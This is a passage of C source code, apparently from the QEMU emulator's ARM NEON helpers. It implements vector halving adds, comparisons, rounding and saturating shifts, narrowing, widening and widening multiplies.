src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) + (src2 >> 1); if (src1 & src2 & 1) dest++; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 + src2 + 1) >> 1 NEON_VOP(rhadd_s8, neon_s8, 4) NEON_VOP(rhadd_u8, neon_u8, 4) NEON_VOP(rhadd_s16, neon_s16, 2) NEON_VOP(rhadd_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_rhadd_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) + (src2 >> 1); if ((src1 | src2) & 1) dest++; return dest; } uint32_t HELPER(neon_rhadd_u32)(uint32_t src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) + (src2 >> 1); if ((src1 | src2) & 1) dest++; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 - src2) >> 1 NEON_VOP(hsub_s8, neon_s8, 4) NEON_VOP(hsub_u8, neon_u8, 4) NEON_VOP(hsub_s16, neon_s16, 2) NEON_VOP(hsub_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_hsub_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) - (src2 >> 1); if ((~src1) & src2 & 1) dest--; return dest; } uint32_t HELPER(neon_hsub_u32)(uint32_t src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) - (src2 >> 1); if ((~src1) & src2 & 1) dest--; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? ~0 : 0 NEON_VOP(cgt_s8, neon_s8, 4) NEON_VOP(cgt_u8, neon_u8, 4) NEON_VOP(cgt_s16, neon_s16, 2) NEON_VOP(cgt_u16, neon_u16, 2) NEON_VOP(cgt_s32, neon_s32, 1) NEON_VOP(cgt_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 >= src2) ? ~0 : 0 NEON_VOP(cge_s8, neon_s8, 4) NEON_VOP(cge_u8, neon_u8, 4) NEON_VOP(cge_s16, neon_s16, 2) NEON_VOP(cge_u16, neon_u16, 2) NEON_VOP(cge_s32, neon_s32, 1) NEON_VOP(cge_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 < src2) ? src1 : src2 NEON_POP(pmin_s8, neon_s8, 4) NEON_POP(pmin_u8, neon_u8, 4) NEON_POP(pmin_s16, neon_s16, 2) NEON_POP(pmin_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? src1 : src2 NEON_POP(pmax_s8, neon_s8, 4) NEON_POP(pmax_u8, neon_u8, 4) NEON_POP(pmax_s16, neon_s16, 2) NEON_POP(pmax_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) \ dest = (src1 > src2) ? 
(src1 - src2) : (src2 - src1) NEON_VOP(abd_s8, neon_s8, 4) NEON_VOP(abd_u8, neon_u8, 4) NEON_VOP(abd_s16, neon_s16, 2) NEON_VOP(abd_u16, neon_u16, 2) NEON_VOP(abd_s32, neon_s32, 1) NEON_VOP(abd_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8 || \ tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(shl_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> (sizeof(src1) * 8 - 1); \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(shl_s16, neon_s16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if ((tmp >= (ssize_t)sizeof(src1) * 8) \ || (tmp <= -(ssize_t)sizeof(src1) * 8)) { \ dest = 0; \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(rshl_s8, neon_s8, 4) NEON_VOP(rshl_s16, neon_s16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_rshl_s32)(uint32_t valop, uint32_t shiftop) { int32_t dest; int32_t val = (int32_t)valop; int8_t shift = (int8_t)shiftop; if ((shift >= 32) || (shift <= -32)) { dest = 0; } else if (shift < 0) { int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_rshl_s64)(uint64_t valop, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; int64_t val = valop; if ((shift >= 64) || (shift <= -64)) { val = 0; } else if (shift < 0) { val >>= (-shift - 1); if (val == INT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x4000000000000000LL; } else { val++; val >>= 1; } } else { val <<= shift; } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8 || \ tmp < -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> (-tmp - 1); \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(rshl_u8, neon_u8, 4) NEON_VOP(rshl_u16, neon_u16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_rshl_u32)(uint32_t val, uint32_t shiftop) { uint32_t dest; int8_t shift = (int8_t)shiftop; if (shift >= 32 || shift < -32) { dest = 0; } else if (shift == -32) { dest = val >> 31; } else if (shift < 0) { uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_rshl_u64)(uint64_t val, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; if (shift >= 64 || shift < -64) { val = 0; } else if (shift == -64) { /* Rounding a 1-bit result just preserves that bit. 
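          * e.g. val = 0x8000000000000000ULL rounds to 1 under a rounding
          * right shift of 64, while any value with the top bit clear
          * rounds to 0 -- exactly what val >> 63 produces.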
*/ val >>= 63; } else if (shift < 0) { val >>= (-shift - 1); if (val == UINT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x8000000000000000ULL; } else { val++; val >>= 1; } } else { val <<= shift; } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ }} while (0) NEON_VOP_ENV(qshl_u8, neon_u8, 4) NEON_VOP_ENV(qshl_u16, neon_u16, 2) NEON_VOP_ENV(qshl_u32, neon_u32, 1) #undef NEON_FN uint64_t HELPER(neon_qshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; if (shift >= 64) { if (val) { val = ~(uint64_t)0; SET_QC(); } } else if (shift <= -64) { val = 0; } else if (shift < 0) { val >>= -shift; } else { uint64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = ~(uint64_t)0; } } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } else { \ dest = src1; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> 31; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } \ }} while (0) NEON_VOP_ENV(qshl_s8, neon_s8, 4) NEON_VOP_ENV(qshl_s16, neon_s16, 2) NEON_VOP_ENV(qshl_s32, neon_s32, 1) #undef NEON_FN uint64_t HELPER(neon_qshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; int64_t val = valop; if (shift >= 64) { if (val) { SET_QC(); val = (val >> 63) ^ ~SIGNBIT64; } } else if (shift <= -64) { val >>= 63; } else if (shift < 0) { val >>= -shift; } else { int64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = (tmp >> 63) ^ ~SIGNBIT64; } } return val; } #define NEON_FN(dest, src1, src2) do { \ if (src1 & (1 << (sizeof(src1) * 8 - 1))) { \ SET_QC(); \ dest = 0; \ } else { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ } \ }} while (0) NEON_VOP_ENV(qshlu_s8, neon_u8, 4) NEON_VOP_ENV(qshlu_s16, neon_u16, 2) #undef NEON_FN uint32_t HELPER(neon_qshlu_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) { if ((int32_t)valop < 0) { SET_QC(); return 0; } return helper_neon_qshl_u32(env, valop, shiftop); } uint64_t HELPER(neon_qshlu_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { if ((int64_t)valop < 0) { SET_QC(); return 0; } return helper_neon_qshl_u64(env, valop, shiftop); } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp < -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ dest = 
src1 >> (sizeof(src1) * 8 - 1); \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ }} while (0) NEON_VOP_ENV(qrshl_u8, neon_u8, 4) NEON_VOP_ENV(qrshl_u16, neon_u16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_qrshl_u32)(CPUARMState *env, uint32_t val, uint32_t shiftop) { uint32_t dest; int8_t shift = (int8_t)shiftop; if (shift >= 32) { if (val) { SET_QC(); dest = ~0; } else { dest = 0; } } else if (shift < -32) { dest = 0; } else if (shift == -32) { dest = val >> 31; } else if (shift < 0) { uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; if ((dest >> shift) != val) { SET_QC(); dest = ~0; } } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_qrshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; if (shift >= 64) { if (val) { SET_QC(); val = ~0; } } else if (shift < -64) { val = 0; } else if (shift == -64) { val >>= 63; } else if (shift < 0) { val >>= (-shift - 1); if (val == UINT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x8000000000000000ULL; } else { val++; val >>= 1; } } else { \ uint64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = ~0; } } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = (1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } \ }} while (0) NEON_VOP_ENV(qrshl_s8, neon_s8, 4) NEON_VOP_ENV(qrshl_s16, neon_s16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_qrshl_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) { int32_t dest; int32_t val = (int32_t)valop; int8_t shift = (int8_t)shiftop; if (shift >= 32) { if (val) { SET_QC(); dest = (val >> 31) ^ ~SIGNBIT; } else { dest = 0; } } else if (shift <= -32) { dest = 0; } else if (shift < 0) { int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; if ((dest >> shift) != val) { SET_QC(); dest = (val >> 31) ^ ~SIGNBIT; } } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_qrshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; int64_t val = valop; if (shift >= 64) { if (val) { SET_QC(); val = (val >> 63) ^ ~SIGNBIT64; } } else if (shift <= -64) { val = 0; } else if (shift < 0) { val >>= (-shift - 1); if (val == INT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. 
*/ val = 0x4000000000000000ULL; } else { val++; val >>= 1; } } else { int64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = (tmp >> 63) ^ ~SIGNBIT64; } } return val; } uint32_t HELPER(neon_add_u8)(uint32_t a, uint32_t b) { uint32_t mask; mask = (a ^ b) & 0x80808080u; a &= ~0x80808080u; b &= ~0x80808080u; return (a + b) ^ mask; } uint32_t HELPER(neon_add_u16)(uint32_t a, uint32_t b) { uint32_t mask; mask = (a ^ b) & 0x80008000u; a &= ~0x80008000u; b &= ~0x80008000u; return (a + b) ^ mask; } #define NEON_FN(dest, src1, src2) dest = src1 + src2 NEON_POP(padd_u8, neon_u8, 4) NEON_POP(padd_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = src1 - src2 NEON_VOP(sub_u8, neon_u8, 4) NEON_VOP(sub_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = src1 * src2 NEON_VOP(mul_u8, neon_u8, 4) NEON_VOP(mul_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 & src2) ? -1 : 0 NEON_VOP(tst_u8, neon_u8, 4) NEON_VOP(tst_u16, neon_u16, 2) NEON_VOP(tst_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 == src2) ? -1 : 0 NEON_VOP(ceq_u8, neon_u8, 4) NEON_VOP(ceq_u16, neon_u16, 2) NEON_VOP(ceq_u32, neon_u32, 1) #undef NEON_FN /* Count Leading Sign/Zero Bits. */ static inline int do_clz8(uint8_t x) { int n; for (n = 8; x; n--) x >>= 1; return n; } static inline int do_clz16(uint16_t x) { int n; for (n = 16; x; n--) x >>= 1; return n; } #define NEON_FN(dest, src, dummy) dest = do_clz8(src) NEON_VOP1(clz_u8, neon_u8, 4) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz16(src) NEON_VOP1(clz_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz8((src < 0) ? ~src : src) - 1 NEON_VOP1(cls_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz16((src < 0) ? ~src : src) - 1 NEON_VOP1(cls_s16, neon_s16, 2) #undef NEON_FN uint32_t HELPER(neon_cls_s32)(uint32_t x) { int count; if ((int32_t)x < 0) x = ~x; for (count = 32; x; count--) x = x >> 1; return count - 1; } /* Bit count. 
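 * This is the classic SWAR popcount performed independently in each
 * 8-bit lane: 1-bit fields are summed pairwise into 2-bit fields, then
 * into 4-bit fields, then into the final count held in each byte.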
*/ uint32_t HELPER(neon_cnt_u8)(uint32_t x) { x = (x & 0x55555555) + ((x >> 1) & 0x55555555); x = (x & 0x33333333) + ((x >> 2) & 0x33333333); x = (x & 0x0f0f0f0f) + ((x >> 4) & 0x0f0f0f0f); return x; } /* Reverse bits in each 8 bit word */ uint32_t HELPER(neon_rbit_u8)(uint32_t x) { x = ((x & 0xf0f0f0f0) >> 4) | ((x & 0x0f0f0f0f) << 4); x = ((x & 0x88888888) >> 3) | ((x & 0x44444444) >> 1) | ((x & 0x22222222) << 1) | ((x & 0x11111111) << 3); return x; } #define NEON_QDMULH16(dest, src1, src2, round) do { \ uint32_t tmp = (int32_t)(int16_t) src1 * (int16_t) src2; \ if ((tmp ^ (tmp << 1)) & SIGNBIT) { \ SET_QC(); \ tmp = (tmp >> 31) ^ ~SIGNBIT; \ } else { \ tmp <<= 1; \ } \ if (round) { \ int32_t old = tmp; \ tmp += 1 << 15; \ if ((int32_t)tmp < old) { \ SET_QC(); \ tmp = SIGNBIT - 1; \ } \ } \ dest = tmp >> 16; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 0) NEON_VOP_ENV(qdmulh_s16, neon_s16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 1) NEON_VOP_ENV(qrdmulh_s16, neon_s16, 2) #undef NEON_FN #undef NEON_QDMULH16 #define NEON_QDMULH32(dest, src1, src2, round) do { \ uint64_t tmp = (int64_t)(int32_t) src1 * (int32_t) src2; \ if ((tmp ^ (tmp << 1)) & SIGNBIT64) { \ SET_QC(); \ tmp = (tmp >> 63) ^ ~SIGNBIT64; \ } else { \ tmp <<= 1; \ } \ if (round) { \ int64_t old = tmp; \ tmp += (int64_t)1 << 31; \ if ((int64_t)tmp < old) { \ SET_QC(); \ tmp = SIGNBIT64 - 1; \ } \ } \ dest = tmp >> 32; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 0) NEON_VOP_ENV(qdmulh_s32, neon_s32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 1) NEON_VOP_ENV(qrdmulh_s32, neon_s32, 1) #undef NEON_FN #undef NEON_QDMULH32 uint32_t HELPER(neon_narrow_u8)(uint64_t x) { return (x & 0xffu) | ((x >> 8) & 0xff00u) | ((x >> 16) & 0xff0000u) | ((x >> 24) & 0xff000000u); } uint32_t HELPER(neon_narrow_u16)(uint64_t x) { return (x & 0xffffu) | ((x >> 16) & 0xffff0000u); } uint32_t HELPER(neon_narrow_high_u8)(uint64_t x) { return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); } uint32_t HELPER(neon_narrow_high_u16)(uint64_t x) { return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); } uint32_t HELPER(neon_narrow_round_high_u8)(uint64_t x) { x &= 0xff80ff80ff80ff80ull; x += 0x0080008000800080ull; return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); } uint32_t HELPER(neon_narrow_round_high_u16)(uint64_t x) { x &= 0xffff8000ffff8000ull; x += 0x0000800000008000ull; return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); } uint32_t HELPER(neon_unarrow_sat8)(CPUARMState *env, uint64_t x) { uint16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s & 0x8000) { \ SET_QC(); \ } else { \ if (s > 0xff) { \ d = 0xff; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << (n / 2); \ } SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_narrow_sat_u8)(CPUARMState *env, uint64_t x) { uint16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s > 0xff) { \ d = 0xff; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << (n / 2); SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_narrow_sat_s8)(CPUARMState *env, uint64_t x) { int16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s != (int8_t)s) { \ d = (s >> 15) ^ 0x7f; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << 
(n / 2); SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_unarrow_sat16)(CPUARMState *env, uint64_t x) { uint32_t high; uint32_t low; low = x; if (low & 0x80000000) { low = 0; SET_QC(); } else if (low > 0xffff) { low = 0xffff; SET_QC(); } high = x >> 32; if (high & 0x80000000) { high = 0; SET_QC(); } else if (high > 0xffff) { high = 0xffff; SET_QC(); } return low | (high << 16); } uint32_t HELPER(neon_narrow_sat_u16)(CPUARMState *env, uint64_t x) { uint32_t high; uint32_t low; low = x; if (low > 0xffff) { low = 0xffff; SET_QC(); } high = x >> 32; if (high > 0xffff) { high = 0xffff; SET_QC(); } return low | (high << 16); } uint32_t HELPER(neon_narrow_sat_s16)(CPUARMState *env, uint64_t x) { int32_t low; int32_t high; low = x; if (low != (int16_t)low) { low = (low >> 31) ^ 0x7fff; SET_QC(); } high = x >> 32; if (high != (int16_t)high) { high = (high >> 31) ^ 0x7fff; SET_QC(); } return (uint16_t)low | (high << 16); } uint32_t HELPER(neon_unarrow_sat32)(CPUARMState *env, uint64_t x) { if (x & 0x8000000000000000ull) { SET_QC(); return 0; } if (x > 0xffffffffu) { SET_QC(); return 0xffffffffu; } return x; } uint32_t HELPER(neon_narrow_sat_u32)(CPUARMState *env, uint64_t x) { if (x > 0xffffffffu) { SET_QC(); return 0xffffffffu; } return x; } uint32_t HELPER(neon_narrow_sat_s32)(CPUARMState *env, uint64_t x) { if ((int64_t)x != (int32_t)x) { SET_QC(); return ((int64_t)x >> 63) ^ 0x7fffffff; } return x; } uint64_t HELPER(neon_widen_u8)(uint32_t x) { uint64_t tmp; uint64_t ret; ret = (uint8_t)x; tmp = (uint8_t)(x >> 8); ret |= tmp << 16; tmp = (uint8_t)(x >> 16); ret |= tmp << 32; tmp = (uint8_t)(x >> 24); ret |= tmp << 48; return ret; } uint64_t HELPER(neon_widen_s8)(uint32_t x) { uint64_t tmp; uint64_t ret; ret = (uint16_t)(int8_t)x; tmp = (uint16_t)(int8_t)(x >> 8); ret |= tmp << 16; tmp = (uint16_t)(int8_t)(x >> 16); ret |= tmp << 32; tmp = (uint16_t)(int8_t)(x >> 24); ret |= tmp << 48; return ret; } uint64_t HELPER(neon_widen_u16)(uint32_t x) { uint64_t high = (uint16_t)(x >> 16); return ((uint16_t)x) | (high << 32); } uint64_t HELPER(neon_widen_s16)(uint32_t x) { uint64_t high = (int16_t)(x >> 16); return ((uint32_t)(int16_t)x) | (high << 32); } uint64_t HELPER(neon_addl_u16)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ b) & 0x8000800080008000ull; a &= ~0x8000800080008000ull; b &= ~0x8000800080008000ull; return (a + b) ^ mask; } uint64_t HELPER(neon_addl_u32)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ b) & 0x8000000080000000ull; a &= ~0x8000000080000000ull; b &= ~0x8000000080000000ull; return (a + b) ^ mask; } uint64_t HELPER(neon_paddl_u16)(uint64_t a, uint64_t b) { uint64_t tmp; uint64_t tmp2; tmp = a & 0x0000ffff0000ffffull; tmp += (a >> 16) & 0x0000ffff0000ffffull; tmp2 = b & 0xffff0000ffff0000ull; tmp2 += (b << 16) & 0xffff0000ffff0000ull; return ( tmp & 0xffff) | ((tmp >> 16) & 0xffff0000ull) | ((tmp2 << 16) & 0xffff00000000ull) | ( tmp2 & 0xffff000000000000ull); } uint64_t HELPER(neon_paddl_u32)(uint64_t a, uint64_t b) { uint32_t low = a + (a >> 32); uint32_t high = b + (b >> 32); return low + ((uint64_t)high << 32); } uint64_t HELPER(neon_subl_u16)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ ~b) & 0x8000800080008000ull; a |= 0x8000800080008000ull; b &= ~0x8000800080008000ull; return (a - b) ^ mask; } uint64_t HELPER(neon_subl_u32)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ ~b) & 0x8000000080000000ull; a |= 0x8000000080000000ull; b &= ~0x8000000080000000ull; return (a - b) ^ mask; } uint64_t 
HELPER(neon_addl_saturate_s32)(CPUARMState *env, uint64_t a, uint64_t b) { uint32_t x, y; uint32_t low, high; x = a; y = b; low = x + y; if (((low ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { SET_QC(); low = ((int32_t)x >> 31) ^ ~SIGNBIT; } x = a >> 32; y = b >> 32; high = x + y; if (((high ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { SET_QC(); high = ((int32_t)x >> 31) ^ ~SIGNBIT; } return low | ((uint64_t)high << 32); } uint64_t HELPER(neon_addl_saturate_s64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t result; result = a + b; if (((result ^ a) & SIGNBIT64) && !((a ^ b) & SIGNBIT64)) { SET_QC(); result = ((int64_t)a >> 63) ^ ~SIGNBIT64; } return result; } /* We have to do the arithmetic in a larger type than * the input type, because for example with a signed 32 bit * op the absolute difference can overflow a signed 32 bit value. */ #define DO_ABD(dest, x, y, intype, arithtype) do { \ arithtype tmp_x = (intype)(x); \ arithtype tmp_y = (intype)(y); \ dest = ((tmp_x > tmp_y) ? tmp_x - tmp_y : tmp_y - tmp_x); \ } while(0) uint64_t HELPER(neon_abdl_u16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, uint8_t, uint32_t); DO_ABD(tmp, a >> 8, b >> 8, uint8_t, uint32_t); result |= tmp << 16; DO_ABD(tmp, a >> 16, b >> 16, uint8_t, uint32_t); result |= tmp << 32; DO_ABD(tmp, a >> 24, b >> 24, uint8_t, uint32_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_abdl_s16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, int8_t, int32_t); DO_ABD(tmp, a >> 8, b >> 8, int8_t, int32_t); result |= tmp << 16; DO_ABD(tmp, a >> 16, b >> 16, int8_t, int32_t); result |= tmp << 32; DO_ABD(tmp, a >> 24, b >> 24, int8_t, int32_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_abdl_u32)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, uint16_t, uint32_t); DO_ABD(tmp, a >> 16, b >> 16, uint16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_abdl_s32)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, int16_t, int32_t); DO_ABD(tmp, a >> 16, b >> 16, int16_t, int32_t); return result | (tmp << 32); } uint64_t HELPER(neon_abdl_u64)(uint32_t a, uint32_t b) { uint64_t result; DO_ABD(result, a, b, uint32_t, uint64_t); return result; } uint64_t HELPER(neon_abdl_s64)(uint32_t a, uint32_t b) { uint64_t result; DO_ABD(result, a, b, int32_t, int64_t); return result; } #undef DO_ABD /* Widening multiply. Named type is the source type. 
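 * e.g. neon_mull_s8 forms four signed 8x8->16 products and packs them
 * into one 64-bit result; both operands are widened to type2 before the
 * multiply, so the product itself cannot overflow.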
*/ #define DO_MULL(dest, x, y, type1, type2) do { \ type1 tmp_x = x; \ type1 tmp_y = y; \ dest = (type2)((type2)tmp_x * (type2)tmp_y); \ } while(0) uint64_t HELPER(neon_mull_u8)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, uint8_t, uint16_t); DO_MULL(tmp, a >> 8, b >> 8, uint8_t, uint16_t); result |= tmp << 16; DO_MULL(tmp, a >> 16, b >> 16, uint8_t, uint16_t); result |= tmp << 32; DO_MULL(tmp, a >> 24, b >> 24, uint8_t, uint16_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_mull_s8)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, int8_t, uint16_t); DO_MULL(tmp, a >> 8, b >> 8, int8_t, uint16_t); result |= tmp << 16; DO_MULL(tmp, a >> 16, b >> 16, int8_t, uint16_t); result |= tmp << 32; DO_MULL(tmp, a >> 24, b >> 24, int8_t, uint16_t); result |= tmp 